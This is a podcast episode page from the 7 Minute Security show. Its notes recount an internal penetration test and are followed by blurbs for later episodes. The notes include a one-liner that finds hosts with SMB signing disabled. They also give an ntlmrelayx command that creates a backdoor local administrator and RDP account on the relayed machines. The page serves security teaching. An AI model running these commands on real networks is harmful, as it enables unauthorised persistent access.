7MS #372: Tales of Internal Pentest Pwnage - Part 5
7 Minute Security15 Juli 2019

7MS #372: Tales of Internal Pentest Pwnage - Part 5

Today's episode is brought to you by ITProTV. It's never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://pro.tv/7minute

Today I share the (hopefully) exciting and fun conclusion to last week's episode about a tale of internal pentest pwnage! A few important notes from today's episode:

  • Need to find which hosts on your network have SMB signing disabled, and then get a nice clean list of IPs as a result? Try this:
opt/responder/tools/RunFinger.py -i THE.SUBNET.YOU-ARE.ATTACKING/24 -g > hosts.txt grep "Signing:'False'" hosts.txt | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > targets.txt

Source: Pwning internal networks automagically

  • Ready to pass captured hashes from one host to another? Open responder.conf and turn SMB and HTTP to Off, then get Responder running in one window, and ntlmrelayx in another. Specifically, I like to use ntlmrelayx.py -tf targets.txt where targets.txt is the list of machines you found that are not using SMB signing. I also like to add a -c to run a string of my choice. Check out this fun evil little nugget:
net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add

So the full command would be:

ntlmrelayx.py -tf targets.txt -c 'net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add'

Check today's show notes at https://7ms.us for more information!

Avsnitt(720)

7MS #440: Tales of Internal Network Pentest Pwnage - Part 22

7MS #440: Tales of Internal Network Pentest Pwnage - Part 22

Hi! Sorry to be so late with this episode, but I'm excited to share with you another fun tale of pentest pwnage! Key points from today's episode include: We do not do these episodes to brag or put d...

8 Nov 202033min

7MS #439: Cyber News - Ransomware is Definitely Still a Thing Edition

7MS #439: Cyber News - Ransomware is Definitely Still a Thing Edition

Happy October and merry Halloween everybody! We're back with our buddy Joe "the machine" Skeen who is also now a Principal Security Engineer for 7MS! He's also working on a new cert, and speaking of c...

29 Okt 20201h 9min

7MS #438: PCI Professional Certification (PCIP) - Part 4

7MS #438: PCI Professional Certification (PCIP) - Part 4

Yay - I'm a PCIP now! I welcome you to check out our past episodes on PCIP, but in some ways this will be the be all, end all episode on the topic. Today I cover: Study materials that helped me prepar...

21 Okt 202038min

7MS #437: Homecoming and Home ioT Security - Part 3

7MS #437: Homecoming and Home ioT Security - Part 3

Hello! This episode is a true homecoming in that I actually recorded it from home. Yay! WARNING!!! WARNING!!! This episode contains a ton of singing. If you don't like singing, do not listen!!! With t...

14 Okt 202039min

7MS #436: Cleaning Up Your Cloud Clutter

7MS #436: Cleaning Up Your Cloud Clutter

Hey, hope you're having a great week! The last few weeks have had somewhat of a homecoming and home cleaning theme. To continue that train of thought, over the last few days I've gotten heavy into cle...

7 Okt 202048min

7MS #435: Homecoming and Home ioT Security - Part 2

7MS #435: Homecoming and Home ioT Security - Part 2

Hi again! It's sort of fun to release two episodes in one week for a change. If you missed part 1 on our ioT security series, check it out here. Today we dive into some free/cheap monitoring solutions...

2 Okt 202041min

7MS #434: Homecoming and Home ioT Security

7MS #434: Homecoming and Home ioT Security

WE'RE HOME! After almost a year after our fire, we're back, baby! This episode is somewhat of a homecoming that dovetails into an episode about ioT security. I've basically done a 180 degree spin on i...

1 Okt 202034min

7MS #433: Cyber News - Security Skills Gap Edition

7MS #433: Cyber News - Security Skills Gap Edition

Hi! Today our pal Joe "The Machine" Skeen (a.k.a. Gh0sthax has prepared some cyber-licious actionable news stories for us to chew on. Today's stories include: Cybersecurity skills gap (powered by l...

23 Sep 202047min

Populärt inom Politik & nyheter

aftonbladet-krim
rss-krimstad
p3-krim
spar
svenska-fall
aftonbladet-daily
politiken
flashback-forever
rss-expressen-dok
rss-sanning-konsekvens
rss-krimreportrarna
kungligt
ett-rent-noje
rss-vad-fan-hande
motiv
blenda-2
grans
rss-frandfors-horna
rss-flodet
krimmagasinet